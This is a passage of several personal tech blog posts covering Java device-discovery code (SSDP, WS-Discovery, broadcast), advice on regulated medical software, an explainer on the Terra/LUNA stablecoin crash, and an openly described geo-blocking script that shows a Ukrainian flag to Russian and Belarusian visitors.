Anyways — one of these beasts was WS-Discovery, a protocol for finding devices on a network that does exactly the same thing as SSDP. Not “generally the same thing,” but exactly the same thing. The code that works for SSDP works for WSD too, just swap out the HTTP-style metadata for XML. Talk about reinventing the wheel, yeesh. But at least this explains the weird object hierarchy in my discovery classes:

Since these all use callback interfaces and sometimes you just want an answer, I added OneShotServiceDiscovery that wraps up Ssdp and Wsd like this (where “4” below is the number of seconds to wait for UDP responses to come in):

Set<ServiceInfo> infosSSD = OneShotServiceDiscovery.ssdp(4);
Set<ServiceInfo> infosWSD = OneShotServiceDiscovery.wsd(4);

There’s an entrypoint for this too, so to get a WSD device list you can use (the example is my Epson ET-3760):

java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.OneShotServiceDiscovery \
    wsd
...
urn:uuid:cfe92100-67c4-11d4-a45f-e0bb9e278967 | wsdp:Device wscn:ScanDeviceType wprt:PrintDeviceType | http://192.168.5.228:80/WSD/DEVICE | (/192.168.5.228:3702)

Actually, a full WSD implementation is more complicated than this. The protocol defines a “discovery proxy” — a device on the network that can cache device information and reduce network traffic. A proxy advertises itself by sending out HELLO messages with type d:DiscoveryProxy; clients are supposed to switch over to use this service when it’s present. So so much complexity for so so little benefit. No thanks.

Don’t forget the broadcast bunch

And we’re still not done. SSDP and WSD cover a bunch of devices and services, but they still miss a lot. Most of these use some sort of custom broadcast approach. If you poke around in UdpServiceDiscovery you’ll find a few special case bits to handle the broadcast case — we disable the NOTIFICATION thread altogether, and just use the DISCOVERY thread/socket to send out pings and listen for responses. The Misc class provides an entrypoint for this; you can find my Roomba using broadcast port 5678 like this:

java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.Misc \
    255.255.255.255 5678 irobotmcs
...
============ /192.168.4.48:5678
{"ver":"3","hostname":"Roomba-3193C60472324700","robotname":"Bellvoomba","ip":"192.168.4.48","mac":"80:91:33:9D:E2:16","sw":"v2.4.16-126","sku":"R960020","nc":0,"proto":"mqtt","cap":{"pose":1,"ota":2,"multiPass":2,"pp":1,"binFullDetect":1,"langOta":1,"maps":1,"edge":1,"eco":1,"svcConf":1}}

Sometimes you don’t even need a ping. For example, devices that use thes Tuya platform just sit there and constantly broadcast their presence on port 6666 or 6667:

java -cp target/toolbox-1.0-SNAPSHOT.jar \
    com.shutdownhook.toolbox.discovery.Misc \
    255.255.255.255 6667 tuya
...
============ / 192.168.5.253:60913
????1r???8?W??⌂???▲????H??? _???r?9???3?o*?jwz#?$?Z?H?¶?Q??9??r~  ?U

OK, that’s not super useful — it’s my smart ceiling fan, but apparently not all of their devices broadcast on 6666, and the messages on port 6667 are encrypted (using a global key, duh — this code shows how to decrypt them). This kind of thing annoys me because it doesn’t really secure anything and just makes life harder for everyone. I’m going to register my protest by not writing that code myself; that’ll show them.

In any case, you get the point — there are a lot of ways that devices try to make themselves discoverable. I’ve even seen code that just fully scans the network — mini wardialers that check every possible address for specific open ports (an approach that won’t survive the eventual v4-v6 address transition!). It’d be nice if this was more standardized, but I’m happy to live with a little chaos in return for the innovations that pop up every day. It’ll settle out eventually. Maybe.

Now back to that Roku app, which will use something like 5% of the code I wrote for this post. Just one of the reasons I’m a fan of retirement — I can burn cycles on any rabbit hole I damn well please. Getting the code right can be tricky, so perhaps it’ll prove useful to some other nerd out there. And as always, please let me know if you find a bug!

Regulated software for software people

If you’ve built software at any scale, you know how the game works. You get requirements from somewhere — usually they’re wrong or at best incomplete. You do your best to implement and test them, and you ship. Users vote with their clicks as to what features work and which don’t — i.e., they refine the requirements for you — and then you repeat the process. Eventually you converge to a set of features that work, then you do it all over again with a new set of requirements.

If your cycle time is long, that’s called “waterfall” and folks judge you for it, which is sometimes fair but not always. If your cycle time is short, it’s called “agile.” Agile does have some advantages: user feedback gets incorporated more quickly, and doing things in smaller chunks generally results in fewer bugs. A lot of people have written a lot of boring religious articles about the differences here, but in reality most folks fall somewhere in the middle, and it’s usually fine. If you’re building the next Tinder or Candy Crush or whatever, that’s pretty much all the “process” you need to know.

But what if you’re building something for healthcare or another industry where the software is “regulated?” Oh my. “Regulation” is scary and mysterious, and people keep talking about going to jail. There’s a whole industry that as far as I can tell is built around paying protection money to consultants. So it’s not surprising that “regulated” in a software job description is a turn-off for lots of people. Still, it’s the cost of doing business for a lot of important things in the world, so let’s take a look at what’s really going on there.

An important caveat: I have never worked for the FDA or any regulatory agency. I’m not a lawyer. I’m just a guy who has written a bunch of regulated software and believes the advice I’ve received from the “regulatory industry” has been almost entirely crap (a very few people break that mold; you know who you are). My hope here is to give you a straightforward, clear-cut introduction so that you can enter into the process with enough confidence to avoid being bullied by silly hyperbole about going to jail or other craziness. The actual regulators I’ve known just expect you to do your best to build safe, reliable products, and they get that it’s a hard job. Understanding a few key things will not only keep you compliant, it will help you build better stuff. Honest.

The Big Secret

Most of my big-time regulatory work has been with FDA Class 1 and 2 medical devices. “Classification” is a risk stratification based on your “intended use” — a super-important bit of text that precisely defines what your device is supposed to do and how it’s supposed to be used. Nailing these down can be a fraught and expensive process all on its own.

But we’re getting ahead of ourselves here — a common problem in this space! In this piece I’m not going to go deep into the details of any specific regulation — because (cover your ears regulatory folks) they don’t really matter to you. OK, maybe they matter if you’re in a startup and you’re the one that has to actually do the filings … but that’s probably a horrible idea anyways. From a software perspective, pretty much all safety-focused regulation looks exactly the same and can be satisfied by adhering to a set of relatively small and, dare I say, pretty reasonable requirements.

This is a bigger secret than you might think. Thanks to the impenetrable nature of regulatory jargon and text, folks that can claim actual experience are in high demand. It’s to their advantage and job security to make it seem super complicated — nobody wants to go to jail, so we all just keep paying for vague explanations and double-talk. Of course that’s a broad brush —  but it’s more right than wrong.

Software first, not Regulation first

This is my biggest regret from my last regulated gig. I had stepped into a higher risk class of device, and we had hired a set of regulatory folks with no direct software experience. The company was very focused on agency approval, so there was a ton of pressure to get it “right.” Not good excuses, but it is what it is — I let our initial software processes be driven by regulation first. That’s not to say we didn’t build excellent software, because we did — but we did it with a very high burden on the team that honestly was mostly just wasted time and energy. I was lucky to lose only a couple of good people to the noise before we got things more-or-less straightened out.

Your job is to build great software. Finish reading this article, understand what you really need to be able to prove and document, talk to folks you trust, and then use your own software-focused best practices to meet the regs. It is the job of your regulatory team to take what you produce and “package” it into the right form for filings and auditors. This packaging takes work and a depth of understanding not many folks in the industry bring, so you’re probably going to get pushback. Stand your ground. Over time, it is for sure worth adding automation to generate different forms of documentation (this is where we finally ended up) and that’s great — but be confident that, if you execute well, you need not be bound by crazy redundant busywork.

Safety-based regulation in three bullets

Software regulation isn’t really intended to protect against bad or fraudulent actors — there are other laws for that. Instead, the point is to ensure that the specific risks and benefits associated with a product are understood and visible. From a software perspective, that means three things:

  1. You know what it’s supposed to do.
  2. It does what you expect.
  3. You’ve considered the risks.

The first two of these should look pretty familiar. #1 just says that you have a correct and detailed specification. #2 says you tested the software against that specification. These might need to be a bit more formal than you’re used to, but if you don’t have a good starting point, your product probably sucks anyways. You likely already use JIRA or some other system to track features/stories and bugs, so if you can generate the following reports you’re basically done with these first two requirements:

  • A list of features, each with sufficient detail to be implemented.
  • For each feature, a list of test cases that cover the feature.
  • For each test case, a record of each time it was executed and passed or failed.

Formal documentation of test cases and results — and especially links back to the specific features they exercise — can be pretty thin at many companies, where dedicated QA resources are hard to come by. If your tests are automated, a great start is just to log feature IDs along with each test case you run. Together with code coverage reports, that gets you a long way towards compliance. For manual test cases, you will need some way to keep track of things — I’ve used the Zephyr plugin for JIRA with good success, but there are tons of options out there.

Risk Assessment

Documented risk assessment (#3) is new to a lot of folks. The concept can take a bit of getting used to, because if you’re good at your job you’ve been assessing and addressing risks implicitly all along. Is there enough contrast to read this text in high-light situations? Will users understand what “accept” means in this situation? What happens if the user doesn’t scroll down to read the whole message? And so on. By the time you sit down for a “formal” risk analysis, you’ve probably taken care of most issues already.

And yet it’s a requirement to document a formal risk assessment for each feature. The best way I’ve found to manage this is to add a custom field to the requirements management system for risks, and ask folks to just make notes there along the way. Towards the end of the development phase, have the team sit down and clean them up and spend a bit of timing thinking about anything missed. That meeting tends to be pretty quick and actually serves as a nice double-check. Ultimately you’ll want to document four things for each risk identified:

  • What could happen.
  • The potential impact.
  • Some idea of how likely and how severe this would be (more on this below).
  • What you’ve done to mitigate or reduce the risk.

There are tons of rubrics for codifying “likelihood” and “severity” — red zone / green zone kind of stuff. I’m torn about these — there is definitely validity to the balance between risks that might cause actual physical harm but are so unlikely to occur that it would be silly to spend time on them, versus risks that have almost no real impact but could happen so frequently that it justifies extra work. But trying to get too precise is really quite hopeless — I’d just estimate low/medium/high on both dimensions and leave it at that.

Potential bugs are not “risks.” Of course bad code can cause all kinds of problems — but trying to capture that is a useless shell game. That “risk” applies to every feature, and the only mitigation is to develop and test better. Documenting this is useless. Software risks generally come down to user interface confusion, algorithms that break down given extreme inputs, that kind of thing. Honest, it gets easier once you do it for awhile.

Lastly, “documentation” or “user education” is a totally reasonable way to mitigate some risks. Sometimes something important is just complicated, and the user cannot be expected to understand how to use a feature without training and/or documentation. That’s OK! Just don’t use it as a crutch for bad design — your job after all is to build a helpful product, not an obtuse one. A trick that can increase the effectiveness of “mitigation by documentation” is to put the documentation directly into the user experience. For example, the first time the user clicks a particular button you might proactively pop up a dialog that can be dismissed once acknowledged.

The “Manufacturing” gotcha

Hopefully so far you’re feeling OK about all of this. A few tweaks to very standard practices and you’re pretty much capturing all the raw material you need. Woot! Ah, but wait.

Almost for sure you’re building modern software that runs as a service (in the cloud or otherwise), releasing new functionality on a regular basis — and that can make documentation a lot trickier. Maybe I should have mentioned this earlier, but I didn’t want to scare you off. Don’t worry, it’ll be ok.

Traditional medical devices are “things” — tongue depressors, MRI machines, cancer drugs, and so on. A great deal of up-front thought and effort and cost goes into figuring out what to make and how to make it. Prototypes are created. Factories and factory lines are set up. Raw materials are sourced. And then when you’re done, you flip a switch and stamp out thousands or millions of copies, exactly the same way, for years. Within that context, safety-based regulation makes a ton of sense. It expects to see “a” design record for each device. Auditors come in and ask to see “the” documents for a given product.

This worked ok when software shipped on a CD in a box. But when it runs as a service, updated and improved over many iterations in near real-time, things can get messy pretty quickly. Note this isn’t about “waterfall” vs. “agile,” it’s about frequent, incremental releases over time vs. one-and-done “manufacturing.”

My first stab at this didn’t work super-well. We basically just wrapped up each release, no matter how small, into its own set of documents — features, risks, test cases and results. When we did our first independent audit (internal, thankfully) the auditor asked for the documents for product X. I handed over dozens of these release packages and smiled confidently. We did a cool demo. They then said OK, you showed me this feature that does Y, where are the test results that prove it works? Seems like a reasonable request.

Yikes. Like almost every feature, this one had evolved over time. There were probably twenty stories related to it, scattered across dozens of releases, each one incremental, like “add option Z to the menu.” Was all the information there? Sure, you could figure it out if you really understood the product and had a couple of days to sort through it all. But answering that seemingly simple question in real time in the auditing room? No chance. And while I did say that it was the responsibility of your regulatory team to “package” your raw documents into something palatable to an auditor, this kind of synthesis is way too much to ask.

I’m sure there are many ways to address this issue, but we settled on something we called a “component document.” This was a single, authoritative, narrative document that could be used as the starting point for anybody trying to understand what the product did. It explained its purpose, the general approach to building it, and each major feature or feature area, assigning a unique identifier to each. The document was meant to be largely stable — that is, day-to-day features and bug fixes did not require changes to the text. An example might be a component-level feature that says “abnormal results will cause an alert to be sent to the medical team;” a corresponding release-focused requirement might describe specific alert conditions and channels for notification (like email). Adding SMS alerting would be a new requirement in a new release, but wouldn’t require updates to the component document.

By explicitly associating every requirement with a “component-level” feature, it became trivial to assemble coherent documentation packages. There were other benefits as well — for example, we found that if a requirement triggered a text change in the component document, it almost always warranted a full test pass rather than something more targeted. And the component document was a fantastic training vehicle for new engineers and even end users. It certainly isn’t always the case, but this time the regulatory framework really did directly help us improve our development process. Love that!

Almost there… honest!

At this point you should feel confident that you can build software in a way that satisfies the intent of safety-focused regulation. You understand and can explain what you’re building, you have tested it appropriately, you have assessed risks to health and safety — and you have the documents to prove it in an audit setting. This is really good, and frankly notably better than many self-claimed “compliant” software shops I’ve seen in real life. There is no orange jumpsuit in your future (at least for this reason).

That said, there are always more concepts in the regulatory framework you should be thinking about and evolving towards. None of these are all that challenging, and you should at least be prepared to explain to auditors how you think about them:

“V”erification vs “V”alidation

“V&V” is often used as a synonym for “testing” — which is pretty close, but obscures an important distinction between the two that you’ll need to address:

  • “Verification” ensures that features work as they are specified. It makes no judgment about whether the features do the “right” thing, just that they meet the spec.
  • “Validation” ensures that features do what users need them to do. They are really a test of the specifications themselves.

In an ideal world, verification tests are executed through automation and/or your engineering team, while validation tests are done by actual end users. In reality, most end-users aren’t qualified to do a good job, and you risk wasting time on “test theater” that doesn’t really prove anything. You’ll have to find your own way here; a reasonable approach might be to (a) make sure end-users are formally involved in the up-front process of creating specifications, and (b) label your test cases as “verification” or “validation” to show you’ve been thoughtful about both concepts.

Design Documents

Significant architectural decisions should be recorded in “design documents.” These are just engineer-focused documents in any form that help describe “how” the product is built. Think about the kind of documentation you’d like to show to a new developer on the team before they jump into code. Associating design documents with component-level features is a great way to keep a handle on how it all fits together.

Third-party software and/or “SOUP”

If your product incorporates COTS (“Commercial / Off The Shelf”) software, that also needs to be validated. Some vendors may be able to help you with this, and some may already have a base level validation that you can start from. But in most cases, you’ll want to show that the acquired software does what you need it to do. This is typically a “one-and-done” exercise where you (a) document your requirements and (b) write and execute tests cases to show the product satisfies those requirements.

This applies to third-party libraries you use as well, and even to your own internal software that may have been developed “way back when” without any documentation at all (sometimes called SOUP, for “Software of Unknown Provenance”). The same process applies — write some requirements, write some tests, run the tests, and have that documentation ready for auditors.

Surveillance

“Bugs found in the wild” is a fantastic measure of software quality (hint: fewer is better). Your regulatory team should be managing formal “complaints” (escalating to you as needed), but keeping track of which bugs were found post-release is a great practice that will serve you well. A quarterly meeting to discuss trends and identify problematic features shows that you’re taking it seriously, so keep meeting notes and be prepared to show a graph of incidents and their severity over time.

Approvals and Signatures

This is an area that really bugs me. Regulatory folks can get super hung-up on ink-based signatures and extreme measures to ensure that documentation is “tamper-proof.” Full stop, I think this is a waste of time. Regulation is not intended to stop a sophisticated bad actor — it’s supposed to help folks trying to do the right thing. The burden of security theater can be stupid high. My take:

  • The software you use to manage requirements and tests should require login and keep track of who creates/updates items in the system.
  • Don’t delete stuff; instead use “inactive” or “obsolete” statuses to keep irrelevant or mistaken entries out of everyday view.
  • Make sure that the appropriate people (especially end users) mark their approval of requirements and tests in the system by clicking a button or writing a comment, and be able to show a record of that.
  • Don’t go overboard.

A final note about audits and auditors

You’re never going to be “done” tweaking and evolving this stuff. Auditors are paid to find issues, and no matter how great you are, they’re going to find some. Don’t sweat it and don’t be defensive. Listen, create a plan to address what they find, and then — this is the real key — follow through. When that auditor comes back they’re going to assess your response, and the worst thing you can do is just ignore them. If you disagree, start a dialogue and you’re sure to find a reasonable compromise.

Bottom line — bureaucracy is bureaucracy, and there is for sure burden associated with complying with regulation. Some of that burden is stupid, and some of it helps. Believe it or not, the actual regulators really do understand this, and are always working to make it simpler (even right now). Your biggest challenge will be the “industry” of high-priced consultants who are incented only to keep you worried and paying their hourly fees. Don’t freak out. Put in a little work to understand the real intent, honestly work to incorporate the key concepts — and you’ll be just fine.

More crypto hijinks, aka WTF happened to Terra-Luna?

Today I’m setting aside my belief that all crypto is doomed to fail. It is, but that’s a medium-term diagnosis — at least for now, and ignoring the day-to-day bugs that occur in all software, blockchain technology certainly works as advertised. It’s actually super-cool and worth reading up on; my articles on crypto theory and implementation are just two of many reasonable places to start.

But sadly, even if you suspend disbelief about the technology itself, it’s being used to build a ton of straight up con games. That’s maybe a bit harsh — there are obviously true believers out there, but they’re so mixed up together with the con artists that it’s harder and harder to tell the difference. And honestly, when it’s my money on the line, that “difference” doesn’t really matter anyways.

In just the latest example, willful misuse of the world “stable” tanked somewhere between 92-100% of value for “investors” in UST and LUNA tokens — that’s about $45 BILLION USD. And despite an (ever-shrinking) number of frantic screeds to the contrary, that money ain’t coming back, ever. Too bad, so sad.

In the crypto world, a ton has been written about this crash already. Most of those folks know way more than I do, but I thought it’d be useful to create something for the more casual observer, one that doesn’t live and die by their hardware wallet and is curious how things could implode so quickly and so completely.

The short story is just that it was all bullsh*t to begin with, but let’s take a closer look.

Stablecoins

The first thing anybody new to cryptocurrency asks is “but why do people think it’s worth anything?” This tends to quickly become a philosophical conversation, because there is no real answer other than “belief.” People believe that it has value, and they believe that others will agree when it comes time to trade that value for goods or services or whatever. So long as nobody looks at it too hard, all is well. It seems ridiculous when you say it that way, but that’s basically how the US Dollar works too, ever since 1933 when the US government abandoned the gold standard. For that matter you can go even further down the rabbit hole — why is gold itself worth anything? Sure there are some commercial use cases for the metal, but that’s just noise — really it just comes down to belief.

But despite that semi-logical equivalence, there is definitely a huge popularly-perceived difference between cryptocurrencies, which can be created on a whim by deploying a new blockchain (or just a smart contract), and “fiat” currencies that are backed by a government or similar supposedly-reliable entity. “Stablecoins” were invented as a solution for folks that like the mechanics of cryptocurrency (anonymity, smart contracts, etc.) but want the confidence that comes with traditional money.

Stablecoins are honestly just about the only thing in the crypto world that are truly easy to understand. It’s just the gold standard for 2022 — somebody “mints” new crypto tokens and promises that each one is “backed” by actual reserves of some fiat or hard currency. For example, Tether tokens are minted by Tether Holdings Limited, a company registered in Hong Kong, and are guaranteed to be backed 1:1 with real world reserves. Each of their USDT tokens is backed by $1 USD, so at least theoretically you can always swap one for a crisp new Washington. This makes them “stable” — their value should never fluctuate more than the reserve currency does.

Of course, to trust the token you have to trust the entity holding the reserves — despite its price stability Tether hasn’t made a lot of friends in the New York AG’s office. There will always be good companies and bad companies out there, and the balance with regulators is a never-ending dance. But at least the concept makes sense and is fundamentally sound.

Not-so-stablecoins

Alas, true stablecoins are just too simple for some folks. It is true that they are only as “safe” as the entity that vouches for them. And the asset centralization they require does run contrary to crypto’s power-to-the-people vibe. One attempt at addressing these issues is the so called “algorithmic stablecoin,” an interesting concept that unfortunately doesn’t deserve its moniker. Until a few days ago, the most popular algorithmic stablecoin was UST or “Terra.

Here’s how it worked. At first, UST wasn’t backed by any reserves at all. Instead it was launched with a sister coin, a traditional cryptocurrency called LUNA. Terra is the earth and Luna is the moon, get it? The trick was that you could always trade LUNA for UST as if UST was worth exactly $1 USD. Trading from one coin to the other was destructive — that is, you destroy one LUNA to get one new UST or vice versa.

In theory, this dynamic would cause behavior that always kept UST right around that $1 USD “peg.” This stuff is really hard for me keep track of, so here’s how it breaks down:

  • Say UST is trading at $1.01 (USD) and LUNA is at $10.
  • I buy 1 LUNA token for $10 USD.
  • I swap my LUNA for UST. Because this is always done as if UST was worth $1, I get 10 new UST tokens and my original LUNA token is destroyed.
  • I sell my UST and receive $10.10 USD.

Woo hoo! I’m now $.10 richer than I was (at least if you ignore the transaction fees). Critically, because there is now more UST in the world, it has become less scarce which will naturally push the price down towards $1. People will keep making this trade and taking profits until it hits the peg again.

The reverse works just as well. If UST is trading for $.99, I can start with a UST purchase, swap to LUNA and then sell that for USD. I make the same profit, but UST becomes more scarce this time, pushing the price back up towards $1. Since the LUNA side of the algorithm isn’t pegged to anything, it is free to swing up and down with the market, just like BTC or any other cryptocurrency. In this way LUNA was said to “absorb volatility” for UST.

As long as people stay interested in UST, it should keep its peg and LUNA will thrive. The “Anchor” protocol was the third leg of that stool — a scheme by which folks could deposit their UST tokens in return for an annual interest rate of 20%. Compared to anything in the “traditional” finance world, that is an insane guaranteed rate of return. Where did it come from? Anchor acts as a traditional money market for UST and additionally uses its holdings to earn staking rewards on other proof-of-stake blockchains (see here for a little jargon relief). To be fair, Anchor tweaked things over time, but that’s it in broad strokes. People were incented to buy UST and deposit it with Anchor — something like 70% of the entire UST supply lived there.

A-bit-more-stablecoins

All this is very cute, but it’s still just part of the larger crypto shell game. Neither UST nor LUNA was actually backed up by anything but belief. Folks did actually notice this, creating demand that at the start of this year resulted in the founding of the “Luna Foundation Guard.” The LFG was created to help backstop the UST/LUNA ecosystem, primarily with $3.5B in BTC. Now sure we’re backing crypto with crypto — but it is fair to say that of all the crypto out there, Bitcoin is probably the “safest” (yeesh, I just threw up a little writing that).

Between their algorithms, Anchor and the LFG it seemed like UST/LUNA was riding pretty high, with a combined market cap of about $60B USD just last month. Of course $3.5B against $60B is nothing like a true stablecoin reserve, but it was something, and was met with real enthusiasm. (In an amusing-for-some-of-us anecdote, LFG acquired about $1B of that reserve by trading UST to Genesys!)

And, scene.

Right around May 7, a few huge investors started dumping UST (for example this swap of $85M into the actual stablecoin USDC). Most of these dumps came out of Anchor deposits, which eroded trust in future Anchor yields and cascading exits. LFG did what it was supposed to and deployed resources to shore things up, but it didn’t help. And as the supply of UST kept going down, the supply of LUNA exploded — more than 6,000 BILLION new LUNA tokens were minted this month, which of course destroyed its value too.

As of today, the LFG resources are exhausted and the Korean police are sequestering their remaining assets. Meanwhile, the asshat crypto-bro that started all this just keeps on rolling and is trying to convince people to jump on board with his new “Terra 2.0” … holy crap.

Anonymity being what it is, it’s not entirely clear why things collapsed as quickly as they did. I’ve read speculation that it was an orchestrated attempt by BTC shorts — forcing LTG to sell its holdings all at once created downward pressure on Bitcoin that others could take advantage of. But it’s all basically guesses, and you don’t really need a conspiracy theory to explain the implosion. Belief-based value is only good as long as people keep believing. The whole market has been on shaky ground — and the mostly-unregulated crypto market is incredibly vulnerable to panic.

TLDR, saying something is “stable” doesn’t magically make it so.

Look, I’m the farthest thing from a financial genius. But what I believe is this — the most reliable way to lasting value is to build things that improve the world. For sure some new things are coming out of the crypto world, and those will last. But most of it? Garbage.

RuBy – Blocking Russia and Belarus

The Internet is a funny place. At the exact same moment that Russian troops are committing war crimes in the real world, Russian users online are just bopping around as if everything is cool. ShutdownHook is anything but a large-scale website, but it does get enough traffic to provide interesting insights in the form of global usage maps. And pretty much every day, browsers from Russia (and very occasionally Belarus) are stopping by to visit.

Well, at least they were until this afternoon. My love for free speech does not extend to aiding and abetting my enemies — and until the people of Russia and Belarus abandon their attacks on Ukraine, I’m afraid that is the best term for what they are. And before you spin up the de rigueur argument about not punishing people for the acts of their government, please just save it. I get the point, but there is nobody on earth that can fix these countries other than their citizens. They do bear responsibility — just as I and my fellow Americans did when we granted a cowardly, bullying toddler the United States’ nuclear codes for four years. Regardless of our individual votes.

Anyways, while I’m certainly not changing the world with my amateur postings here on ShutdownHook, I am trying in a very small way to share ideas and experience that will make folks better engineers and more creative and eclectic individuals. And I just don’t want to share that stuff with people who are, you know, helping to kill families and steal or destroy their homes. Weird, I know.

Enter RuBy — a tiny little web service that detects browsers from these two countries and replaces site content with a static Ukrainian Flag. You can add it to your web site too, and I hope you will. All it takes is one line anywhere on your site:

 <script src="https://shutdownapps.duckdns.org:7076/ruby.js" type="text/javascript" defer></script>

It’s not perfect — the same VPN functionality that folks use to stream The Great Pottery Throw Down before it’s available in the States will foil my script. But that’s fine — the point is to send a general message that these users are not welcome to participate in civilized company, and I think it does the trick.

If you’d rather not use the script from my server, the code is freely-available on github — go nuts. I’ll cover all the details in this post, so keep on reading.

Geolocation Basics

Image credit Wikipedia

Geolocation is a general term for a bunch of different ways to figure out where a particular device exists in the real world. The most precise of these is embedded GPS. Pretty much all of our phones can receive signals from the GPS satellite network and use that information to understand where they are — it’s how Google Maps shows your position as you sit in traffic during your daily commute. It’s amazing technology, and the speed with which we’ve become dependent on it is stunning.

Most other approaches to positioning are similar; they rely on databases that map some type of identifiable signal to known locations. For your phone that might be cell towers, each of which broadcasts a unique identifier. Combining this data (e.g., from opencellid.org) with real-time signal strength can give some pretty accurate results. You can do the same thing with a location-aware database of wifi networks like the one at wigle.net (the nostalgia behind “wardriving” is strong for this nerd). Even the old WWII-era LORAN system basically worked this way.

But the grand-daddy of location techniques on the Internet is IP-based geolocation, and it remains the most common for locating far-away clients without access to signal-based data. Each device on the Internet has an “IP Address” used to route messages — you can see yours at https://whatsmyip.com/ (ok technically that’s probably your router’s address, but close enough). This address is visible to both sides of a TCP/IP exchange (like a browser making a request to a web server), so if the server has access to a location-aware database of IP addresses, it can estimate the browser’s real-world location. The good folks at ip2location.com have been maintaining exactly this database for years, and insanely they still make a version available for free at https://lite.ip2location.com/.

The good news for IP-based geolocation is that it’s hard to technically spoof an IP address. The bad news is that it’s easy to insert devices between your browser and a server, so spoofing isn’t really even required to hide yourself. The most common approach is to use a virtual private network (“VPN”). With a VPN your browser doesn’t directly connect to the web server at all — instead, it connects to a VPN server and asks it to talk to the real server on your behalf. As far as the server is concerned, you live wherever your VPN server lives.

There are whole companies like NordVPN that deliver VPN services. They maintain thousands of VPN servers — one click makes your browser appear to be anywhere in the world. Great for getting around regional streaming restrictions! And to be fair, a really good way to increase your privacy profile on the Internet. But still, just a teeny bit shady.

Geo-Blocking

There are a few ways to use IP-based location data to restrict who is allowed to visit a website. Most commercial or high-traffic sites sit behind some kind of a firewall, gateway or proxy, and most of these can automatically block traffic using location-based rules. This is actually pretty common, in particular to protect against countries (you know who you are) that tend to be havens for bad actors. Cloud providers like Azure and AWS are making this kind of protection more and more accessible, which is a great thing.

Another approach is to implement blocking at the application level, which is what I’ve done with RuBy. In theory this is super-simple, but there are some interesting quirks of the IP addressing landscape that make it worth some explanation.

But first a quick side note — there are no new ideas, and it turns out that I’m not the only person to have come up with this one. The folks over at redirectrussia.org have a script as well — it’s a little more complicated than mine, and a bit smarter — e.g., they limit web service calls by doing a first check on the browser’s timezone setting. They also allow the site owner to redirect blocked clients to a site of their choosing, whereas I just slap a flag over the page and call game over. Whichever you pick, you’re doing a solid for the good guys.

RuBy as a Web Service

Using the web service is about as simple as it gets; just add that one-line script fragment anywhere on your page and you’re done. Under the covers, what happens is this:

  • The browser fetches some javascript from the URL at https://shutdownapps.duckdns.org:7076/ruby.js. Note the “defer” attribute on the tag; this instructs the browser to load the script asynchronously and delay execution until the rest of the page is loaded. This avoids any performance impact for pages using the script.
  • The web service examines the incoming IP address and compares it to a list of known address ranges coming from Russia and Belarus. If the IP is not in one of those ranges, an empty script is returned and the page renders / behaves normally.
  • If the IP is in one of those ranges, the returned script replaces the HTML of the page with a full-window rendering of the Ukrainian flag (complete with official colors #005BBB and #FFD500). I considered redirecting to another site, but preferred the vibe of fully dead-ending the page.

Most systems can pretty easily add script tags to template pages. For ShutdownHook it was a little harder because I was using a subscription plan at WordPress.com that doesn’t allow it. This isn’t a problem if you’re on the “business” plan (I chose to upgrade) or are hosting the WordPress software yourself or anywhere that allows plugins. After upgrading, I used the very nice “Insert Headers and Footers” plugin to insert the script tag into the HEAD section of my pages.

And really, that’s it. Done and done.

RuBy Under the Covers

The lookup code itself lives in RuBy.java. It depends on access to the IP2Location Lite “DB1” database; in particular the IPV6 / CSV version. Now, there are tons of ready-to-go libraries for working with this database, including for Java. I chose to implement my own because RuBy has very specific, simple requirements that lend themselves to a more space- and time-efficient implementation than a general-purpose library. A classic engineering tradeoff — are those benefits worth the costs of implementation and code ownership? In my case I think so, because I’m running the service for free and want to keep hardware costs to a minimum, but there are definitely arguments on both sides.

In a nutshell, RuBy is configured with a database file and a list of countries to block (specified as ISO-3166 alpha-2 codes). It makes a number of assumptions about the format of the data file (listed at the top of the source file), so be careful if you use another data source. Only matching ranges are loaded into an array sorted by the start of the range, and queries are handled by binary-searching into the array to find a potentially matching range and then checking its bounds. For Russia and Belarus, this ends up holding only about 18,000 records in memory, so resource use is pretty trivial.

IP addressing does get a little complicated though; converting text-based addresses to the integer values in the lookup array can be tricky.

Once upon a time we all used “v4” addresses, which you’ve surely seen and look like this: 127.0.0.1. Each of the four numbers are byte values from 0-255, so there are 8 * 4 = 32 bits available for a total of about 4.3 billion unique addresses. Converting these to a number is a simple matter that will look familiar to anyone who ever had to implement “atoi” in an interview setting:

a.b.c.d = (16777216 * a) + (65536 * b) + (256 * c) + d

Except, oops, it turns out that the Internet uses way more than 4.3 billion addresses. Back a few years ago this was the source of much hand-wringing and in fact the last IPv4 addresses were allocated to regional registries more than a decade ago. The long-term solution to the problem was to create “v6” addressing which uses 128 bits and can assign a unique address to a solid fraction of all the atoms that make up planet Earth. They’re pretty ugly (e.g., 2001:0db8:85a3:0000:0000:8a2e:0370:7334), but they do the trick.

Sadly though, change is hard, and IPv4 has stubbornly refused to die — only something like 20-40% of the traffic on the Internet is currently using IPv6. Mostly this is because somebody invented NAT (Network Address Translation) — a simple protocol that allows all of the dozens of network devices in your house or workplace to share a single public IP address. So at least for the foreseeable future, we’ll be living in a world where both versions are out in the wild.

To get the most coverage, we use the IP2Location database that includes both v4 and v6 addresses. All of the range values in this database are specified as v6 values, which we can manage because a v4 address can be converted to v6 just by adding “::FFFF:” to the front. This amounts to adding an offset of 281,470,681,743,360 to its natural value — you can see this and the other gyrations we do in the addressToBigInteger method (and for kicks its reverse in bigIntegerToAddress).

Spread the Word!

Technically, that’s about it — pretty simple at the end of the day. But getting everything lined up cleanly can be a bit of a hassle; I hope that between the service and the code I’ve made it a little easier.

Most importantly, I hope people actually use the code on their own websites. We really are at a critical moment in modern history — are we going to evolve into a global community able to face the big challenges, or will we slide back to 1850 and play pathetic imperialist games until we just extinguish ourselves? My generation hasn’t particularly distinguished itself yet in the face of this stuff, but I’m hopeful that this disaster is blatant enough that we’ll get it right. My call to action:

  • If you run a website, consider blocking pariah nations. You can do this with your firewall or gateway, with the RuBy or Redirect Russia scripts, or just roll your own. The only sites I hope we’ll leave open are the ones that might help citizens in these countries learn the truth about what is really happening.
  • Share this article with colleagues and friends on social media so they can do the same.
  • And even more key, (1) give to causes like MSF that provide humanitarian aid, and (2) make sure our representatives continue supporting Ukraine with lethal aid and punishing Russia/Belarus with increasing sanctions.

If I can help with any of this, just drop me a line and let me know.

Attribution: This site or product includes IP2Location LITE data available from https://lite.ip2location.com.

You got your code in my data, or, how hacks work.

Once upon a time, hacking was easy and cheap entertainment, and we did it all the time:

